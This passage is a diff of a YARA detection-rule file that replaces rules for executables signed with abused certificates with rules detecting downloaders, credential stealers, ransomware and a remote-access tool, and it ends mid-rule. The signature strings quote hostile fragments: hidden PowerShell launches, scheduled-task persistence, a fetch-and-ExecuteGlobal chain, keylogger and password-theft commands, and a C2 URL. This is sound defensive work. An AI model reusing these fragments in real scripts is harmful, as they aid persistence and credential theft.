-		thumbprint = "8acfaa12e5d02c1e0daf0a373b0490d782ea5220"
-		importance = 20
+
+	strings:
+		$m1 = "main.connectviaproxy" ascii
+		$m2 = "main.connectForSocks" ascii
+		$m3 = "main.listenForClients" ascii
+		$m4 = "main.listenForSocks" ascii
+		$s1 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
+		$s2 = "Server: nginx/1.14.1" ascii
+		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" ascii
+		$s4 = "wine_get" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $m* ) and 2 of ( $s* ) ) or ( all of ( $s* ) and 1 of ( $m* ) ) or 7 of them )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_09B3A7E559Fcb024C4B66B794E9540Cb : FILE
+rule DITEKSHEN_MALWARE_Win_PWSHDLLDL : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "5e1057d4-a40c-5e48-8965-91fd533c04dc"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects downloader"
+		author = "ditekShen"
+		id = "553ed216-c8c2-504f-b689-0e8d21a00eaa"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4790-L4802"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11288-L11303"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "345abbb31986fe3f8f6b7eb05c73d4d42daa9df6a7706b9cd2fb4f8aac61d40b"
+		logic_hash = "7acef81f0e6e282650c161963599dcbe2b3975d482eb7c330581901b0fe85655"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "59c60ade491c9eda994711b1fdb59510baad2ea3"
-		hash1 = "b57d694b6d1f9e0634953e8f5c1e4faf84fb50be806a8887dd5b31bfd58a167f"
-		importance = 20
+
+	strings:
+		$s1 = "powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file " fullword wide nocase
+		$s2 = "objShell.run \"powershell -WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
+		$s3 = "cmd.exe /c schtasks.exe /create /tn \"" fullword wide nocase
+		$s4 = "-WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
+		$s6 = "\" /tr \"wscript.exe //b //nologo '" fullword wide nocase
+		$s7 = "\" -Value \"Powershell.exe -WindowStyle hidden \"\"& '" fullword wide nocase
+		$op0 = { 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 }
+		$op1 = { 4b 04 00 00 34 01 00 00 7f 05 00 00 1a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Windscribe Limited" and pe.signatures [ i ] . serial == "09:b3:a7:e5:59:fc:b0:24:c4:b6:6b:79:4e:95:40:cb" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and 5 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_19Beff8A6C129663E5E8C18953Dc1F67 : FILE
+rule DITEKSHEN_MALWARE_Win_Nppspy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "8bc27a0c-898d-510f-ad9d-78d5bab40cad"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects NPPSpy / Ntospy"
+		author = "ditekShen"
+		id = "3867ba96-1162-5693-b58e-fc6fa04d880a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4804-L4815"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11305-L11325"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e62c4ab0652f872887b7bedadba3306c831351f57bc4a177302b1268d823f9f4"
+		logic_hash = "53e929b52dddd5e3d060d2dd9937411f1ff215be4d3c67f5935c2a3fbab006d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ad3deacd821fee3bb158665bd7fa491e39aab2e6"
-		importance = 20
+
+	strings:
+		$s1 = "ntskrnl.dll" fullword ascii
+		$s2 = "PasswordStealing.dll" fullword ascii
+		$s3 = "ntoskrnl.dll" fullword ascii
+		$s4 = "\\programdata\\packag~" ascii
+		$s5 = "NPPSPY.dll" fullword ascii
+		$s6 = "MSControll.dll" fullword ascii
+		$s7 = "\\Windows\\Temp\\" ascii
+		$s8 = "\\NPPSpy\\" ascii
+		$s9 = "NPGetCaps" fullword ascii
+		$s10 = "NPLogonNotify" fullword ascii
+		$path = "\\GrzegorzTworek\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" )
+		uint16( 0 ) == 0x5a4d and ( ( pe.is_dll ( ) and filesize < 110KB and pe.number_of_exports == 2 and ( ( pe.exports ( "NPGetCaps" ) and pe.exports ( "NPLogonNotify" ) ) or ( 1 of ( $s* ) and ( pe.exports ( "NPGetCaps" ) or pe.exports ( "NPLogonNotify" ) ) ) ) ) or ( ( $path ) and any of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : FILE
+rule DITEKSHEN_MALWARE_Win_Agentracoon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "610f4147-9b32-5d96-bf27-10a8e0c3c347"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects AgentRacoon. Not Raccoon"
+		author = "ditekShen"
+		id = "cc31bd71-da96-5a3d-b2f1-40f9745d8d46"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4817-L4828"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11327-L11343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d3e625c05e974650bb9750f6dadbbba5825a34ea10902c807b9da457902d2b59"
+		logic_hash = "7ed17a1bc161855f2bdc432952086f3b86b58ae9ea6c0d541544f4b63a8e08e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0c212cdf3d9a46621c19af5c494ff6bad25d3190"
-		importance = 20
+
+	strings:
+		$s1 = "UdpClient" fullword ascii
+		$s2 = "IPEndPoint" fullword ascii
+		$s3 = "get_Client" fullword ascii
+		$s4 = "set_ReceiveTimeout" fullword ascii
+		$s5 = "Command failed:" wide
+		$s6 = "uploaded" wide
+		$s7 = "downloaded" wide
+		$s8 = ".telemetry." wide
+		$s9 = "xn--" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o." and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56F008E69A7C4C3Feb389C66Eaf58259 : FILE
+rule DITEKSHEN_MALWARE_Win_Simda : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "bcd0cd8e-82ec-5d20-85d1-cbad455b6d90"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects Simda / Shifu infostealer"
+		author = "ditekShen"
+		id = "892a5ffe-ea1a-5df3-9c36-0198fa61b8b6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4830-L4841"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11345-L11361"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ba02eb734b461b02744c5fc901e45f4574249607398fb8a73850d5d5e89788b"
+		logic_hash = "3f06e86033e8f9534f9904a2a63c4717a9532eb235f6f4405ef1db7d9b93f036"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "a7dc8cb973ef5f54af0889549d84dee51a7db839"
-		importance = 20
+
+	strings:
+		$s1 = "command=auth_loginByPassword&back_command=&back_custom1=&" fullword ascii
+		$s2 = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clma" ascii
+		$s3 = "debug_%s_%s.log" fullword ascii
+		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" ascii
+		$s5 = "name=%s&port=%u" ascii
+		$s6 = "id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d" ascii
+		$s7 = "{BotVer:" fullword ascii
+		$s8 = "software\\microsoft\\windows nt\\currentversion\\winlogon" ascii
+		$s9 = /(!|&|data_)inject(=ok)?/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "56:f0:08:e6:9a:7c:4c:3f:eb:38:9c:66:ea:f5:82:59" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_279B3A26F16A069Aa7Bca1811D44Ad9B : FILE
+rule DITEKSHEN_MALWARE_Win_Vbsdownloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "3ead1500-d510-5a9b-8a19-19f9f7f2cf95"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects second stage VBS downloader of third stage VBS"
+		author = "ditekShen"
+		id = "480e6872-3a8c-58c5-a455-02342ec7918c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4857-L4873"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11363-L11375"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a01fd3db421a4b41318fa1264e8bc621ddeddb44b82b8f0b15e97eccec616e8"
+		logic_hash = "fee9a78e60d02ff2f03035812af2bf36fe350c70d3e4e094713791833f8ba4d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4a9fc15f1d63145b622989c4f5bec4612095401e"
-		hash1 = "fc642048d9f0b8cb36649fd377fdb68dce3998f2a88e8c64acdc4e88435f2562"
-		hash2 = "914067034336e4ed8b56e66d6be29f34477d9fb38ba73095a3edca5ec9cb1a9c"
-		hash3 = "daf7e148f82807808cac8a21b1a3ce43491c3a140420442a1c1ee2d497a9e0a2"
-		hash4 = "3727044bebe4a14aed66df5119c11471a57b50c57ab4baaef4073323206d3b9b"
-		hash5 = "f0239d16f77b11e6b606b23a53c9e563f6360a27a03c0b9cf83b151ee8ee9088"
-		importance = 20
+
+	strings:
+		$s1 = "CreateObject(\"MSXML2.ServerXMLHTTP\")" wide
+		$s2 = ".Open \"GET\"," wide
+		$s3 = ".Send" wide
+		$s4 = ".responseText" wide
+		$s5 = "ExecuteGlobal" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DEVLIN LIMITED" and pe.signatures [ i ] . serial == "27:9b:3a:26:f1:6a:06:9a:a7:bc:a1:81:1d:44:ad:9b" )
+		filesize < 50KB and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_07Cef66A71C35Bc3Aed6D100C6493863 : FILE
+rule DITEKSHEN_MALWARE_Win_Umbralstealer : FILE
 {
-	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "e07b0a2c-64ff-5e12-9f19-00a67a13fb89"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+	meta:
+		description = "Detects Umbral infostealer"
+		author = "ditekShen"
+		id = "695a350b-3d8e-5244-a275-a60202a8e956"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4875-L4886"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11377-L11398"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24b89e65bc9d60a60e57f749735214c462e56c3194906e4bca52d74463617be4"
+		logic_hash = "1686e4626e4d6335f028d6cb6471c32dac747a77fc95d97b4c9dfd043ba975e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9f65b1f0bed6e58ecdcc30b81b08b350fcc966a1"
-		importance = 20
+
+	strings:
+		$x1 = "Umbral Stealer" wide
+		$x2 = "Umbral.payload." ascii
+		$s1 = "U2V0LU1wUHJlZmVyZW5jZ" wide
+		$s2 = "{{ Key = {0}, Value = {1} }}" wide
+		$s3 = "csproduct get uuid" wide
+		$s4 = "0.0.0.0 www."
+		$s5 = /(set|get)_Take(Screen|WebcamSnap)shot/ fullword ascii
+		$s6 = "still_pin" fullword ascii
+		$c1 = "kaspersky.com" wide
+		$c2 = "bitdefender.com" wide
+		$c3 = "virustotal.com" wide
+		$c4 = "malwarebytes.com" wide
+		$c5 = "clamav.net" wide
+		$c6 = "trendmicro.com" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 4 of ( $c* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D3356318924C8C42959Bf1D1574E6482 : FILE
+rule DITEKSHEN_MALWARE_Win_Metastealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MetaStealer infostealer"
 		author = "ditekSHen"
-		id = "7e23e9cf-5a34-55bb-a88d-4c0aef411372"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "46aa30c1-12c2-56df-8c65-0b96147f9051"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4888-L4899"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11400-L11423"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "86ca8da7e9e704f64be8ecd9e270108337d28b540ba8cd669a8d536ccfefea95"
+		logic_hash = "260c6d90a89ddb6219a5cbad18058e41611ae2dc68a8d4e589fa6ca81853752f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e21f261f5cf7c2856bd9da5a5ed2c4e2b2ef4c9a"
-		importance = 20
+
+	strings:
+		$s1 = "! #\"'&(&*)>=@?POQOROSOTOUOVOWOXOYOZO[O^]{z|z}z~z" fullword wide
+		$s2 = "{0}{1}{2}" fullword wide
+		$s3 = "localhost" fullword wide
+		$s4 = "\\tdata" fullword wide
+		$s5 = "DecryptBlob" fullword ascii
+		$s6 = "GetMac" fullword ascii
+		$s7 = "GetHdc" fullword ascii
+		$s8 = "FindProc" fullword ascii
+		$s9 = "targetPid" fullword ascii
+		$s10 = "MessageSecurityOverTcp" fullword ascii
+		$s11 = "ListOfProcesses" fullword ascii
+		$s12 = "ListOfPrograms" fullword ascii
+		$s13 = "browserPaths" fullword ascii
+		$s14 = "configs" fullword ascii
+		$s15 = "scanners" fullword ascii
+		$s16 = "FileScannerRule" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" )
+		uint16( 0 ) == 0x5a4d and 7 of ( $s* )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_038Fc745523B41B40D653B83Aa381B80 : FILE
+rule DITEKSHEN_MALWARE_Win_Mediapi : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MediaPI"
 		author = "ditekSHen"
-		id = "ed7581eb-52e7-5216-86a2-079bc5741b05"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "95db8772-1bcd-5eea-956c-c9578b8e1329"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4901-L4912"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11425-L11439"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b760525c38610b8a5cc990335122eab81cb895dc523908ef841c5c3117a1a372"
+		logic_hash = "2bce0a96b45e46c0cbd913dacb3dfe7ae1b519102d637e0fd9dabe2008037d94"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "05124a4a385b4b2d7a9b58d1c3ad7f2a84e7b0af"
-		importance = 20
+
+	strings:
+		$s1 = "SomeFunction" ascii
+		$s2 = "\"stealth" ascii
+		$s3 = "\"ServAddr" ascii
+		$s4 = "\"ServPort" ascii
+		$s5 = "\"ServIp" ascii
+		$s6 = "\"wsaData" ascii
+		$s7 = "\"-socket" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( 6 of them ) or ( 3 of them and pe.exports ( "SomeFunction" ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ac0A7B9420B369Af3Ddb748385B981 : FILE
+rule DITEKSHEN_MALWARE_Win_Blackhunt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlackHunt ransomware"
 		author = "ditekSHen"
-		id = "0935fd31-3d8f-57d2-a00e-ad7d5cdbe12d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4bdb26dd-a424-54a6-b313-e98bdf18cfce"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4914-L4925"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11441-L11456"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "47dca0d0b84dd0d210cf7fdda3bcce796d090e5de3f4266bbed01eebdd397bfa"
+		logic_hash = "62e9bc505eff3e19ff0cdaf180e45e6d7917f0bec7cd9b007bee9fe1d9d09b66"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "15b56f8b0b22dbc7c08c00d47ee06b04fa7df5fe"
-		importance = 20
+
+	strings:
+		$s1 = /#BlackHunt_(Logs|BG|Icon|Public|Private|ID|ReadMe|Update)\.(txt|jpg|ico|key|hta)/ ascii wide
+		$s2 = /-(biggame|noencrypt|netinfo|nospread)/ fullword wide
+		$s3 = "/v \"*BlackHunt\" /t REG_SZ /d" wide
+		$s4 = "/sc onstart /TN \"Windows Critical Update\" /TR \"'%s' %s\" /F" wide
+		$s5 = "/v \"DisableChangePassword\" /t REG_DWORD /d" wide
+		$s6 = "<span> %s </span>this ID (<span> %s </span>)" wide
+		$s7 = "}div.header h1 span#hunter" wide
+		$s8 = "BLACK_HUNT_MUTEX" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00913Ba16962Cd7Eee25965A6D0Eeffa10 : FILE
+rule DITEKSHEN_MALWARE_Win_Scoutelite : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ScoutElite"
 		author = "ditekSHen"
-		id = "7a053089-44c8-5f30-8eee-dcd4ba24efe8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4927-L4938"
+		id = "989f558b-f84c-5f64-b85d-618d83f96782"
+		date = "2020-11-06"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11458-L11531"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2e729c053d1a9d5895dc2247ea0804525f8f1744875d5c2f96b4255ad325dc5"
+		logic_hash = "935bd891a9b68cb6ddad86db843de624f3a7ec0824f2b4c6ff0da56422b79668"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "079aeb295c8e27ac8d9be79c8b0aaf66a0ef15de"
-		importance = 20
+
+	strings:
+		$cmd1 = "command=scote_ping" fullword ascii
+		$cmd2 = "command=scote_info_ipconfig" fullword ascii
+		$cmd3 = "command=scote_info_systeminfo" fullword ascii
+		$cmd4 = "command=scote_connection|hwid=" fullword ascii
+		$cmd5 = "command=ping" fullword wide
+		$cmd6 = "command=screen_capture_init" fullword wide
+		$cmd7 = "command=screen_capture" fullword wide
+		$cmd8 = "command=silence_screenshot" fullword wide
+		$cmd9 = "command=silence_keylogger" fullword wide
+		$cmd10 = "command=silence_password" fullword wide
+		$cmd11 = "command=screen_thumb" fullword wide
+		$cmd12 = "command=filemanager_upload_tcp" fullword wide
+		$cmd13 = "command=filemanager_download" fullword wide
+		$cmd14 = "command=filemanager_init" fullword wide
+		$cmd15 = "command=filemanager_root" fullword wide
+		$cmd16 = "command=filemanager_folder_filemanager_file" fullword wide
+		$cmd17 = "command=filemanager_thumb" fullword wide
+		$cmd18 = "command=keylogger_init" fullword wide
+		$cmd19 = "command=keylogger_file" fullword wide
+		$cmd20 = "command=password_firefox" fullword wide
+		$cmd21 = "command=password_opera" fullword wide
+		$cmd22 = "command=password_chrome" fullword wide
+		$cmd23 = "command=password_all" fullword wide
+		$cmd24 = "command=password_init" fullword wide
+		$cmd25 = "command=misc_init" fullword wide
+		$cmd26 = "command=misc_process" fullword wide
+		$cmd27 = "command=misc_cmd" fullword wide
+		$cmd28 = "command=new_rcs" fullword wide
+		$cmd29 = "command=microphone_capture" fullword wide
+		$cmd30 = "command=microphone_capture_init" fullword wide
+		$cmd31 = "command=rvmedia_capture_init" fullword wide
+		$cmd32 = "command=rvmedia_list" fullword wide
+		$cmd33 = "command=rvmedia_resolution" fullword wide
+		$cmd34 = "command=webcam_capture_init" fullword wide
+		$cmd35 = "command=webcam_list" fullword wide
+		$cmd36 = "command=webcam_resolution" fullword wide
+		$cmd37 = "command=webcam_capture" fullword wide
+		$gcmd1 = "filemanager_download_ftp" fullword wide
+		$gcmd2 = "download_file_ftp" fullword wide
+		$gcmd3 = "filemanager_upload_http" fullword wide
+		$gcmd4 = "upload_file_http" fullword wide
+		$gcmd5 = "upload_url" fullword wide
+		$gcmd6 = "filemanager_delete" fullword wide
+		$gcmd7 = "filemanager_execute_file" fullword wide
+		$gcmd8 = /(microphone|webcam|rvmedia|keylogger|password|screen|filemanager)_(host|port|guid)/ nocase
+		$confs1 = "[nick_name]" fullword ascii
+		$confe1 = "[/nick_name]" fullword ascii wide
+		$confs2 = "[install_name]" fullword ascii wide
+		$confe2 = "[/install_name]" fullword ascii wide
+		$confs3 = "[install_folder]" fullword ascii wide
+		$confe3 = "[/install_folder]" fullword ascii wide
+		$confs4 = "[reg_startup]" fullword ascii wide
+		$confe4 = "[/reg_startup]" fullword ascii wide
+		$confs5 = "[folder_startup]" fullword ascii wide
+		$confe5 = "[/folder_startup]" fullword ascii wide
+		$confs6 = "[task_startup]" fullword ascii wide
+		$confe6 = "[/task_startup]" fullword ascii wide
+		$confs7 = "[injection]" fullword ascii wide
+		$confe7 = "[/injection]" fullword ascii wide
+		$confs8 = "[injection_process]" fullword ascii wide
+		$confe8 = "[/injection_process]" fullword ascii wide
+		$confs9 = "[connection]" fullword ascii wide
+		$confe9 = "[/connection]" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JMT TRADING GROUP INC" and pe.signatures [ i ] . serial == "00:91:3b:a1:69:62:cd:7e:ee:25:96:5a:6d:0e:ef:fa:10" )
+		( uint16( 0 ) == 0x5a4d and ( 2 of ( $cmd* ) or 7 of ( $gcmd* ) or ( 2 of ( $confs* ) and 2 of ( $confe* ) ) or ( pe.exports ( "__elite" ) and 2 of them ) ) ) or ( 15 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F44A91704F9Ea388446D2635F2A8C8A5 : FILE
+rule DITEKSHEN_MALWARE_Win_Scouteliteps
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "52f08ec1-fb83-59bc-bb90-2ae12245c0f7"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4940-L4953"
+		description = "Detects actor PowerShell tool designed to steal browsers session cookie and passwords on-disk and in-memory"
+		author = "ditekshen"
+		id = "d2c04d55-9bf7-54f5-8053-835fa60f19cb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11534-L11569"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cec66648ecde5b11a2a20674b2e1f10c8b917ebeb26ddba0ead2b6af45c8519b"
+		logic_hash = "9b1047b8b485fcfa29225f53674050703d32498cfa99654c8ac5f8bfac29878e"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "573514c39bcef5690ab924f9df30577def6e877f"
-		hash1 = "d67dde5621d6de76562bc2812f04f986b441601b088aa936d821c0504eb4f7aa"
-		hash2 = "71f60a985d2cc9fc47c6845a88eea4da19303a96a2ff69daae70276f70dcdae0"
-		importance = 20
+		quality = 37
+		tags = ""
+
+	strings:
+		$cnc1 = "http://beginpassport.com" ascii wide nocase
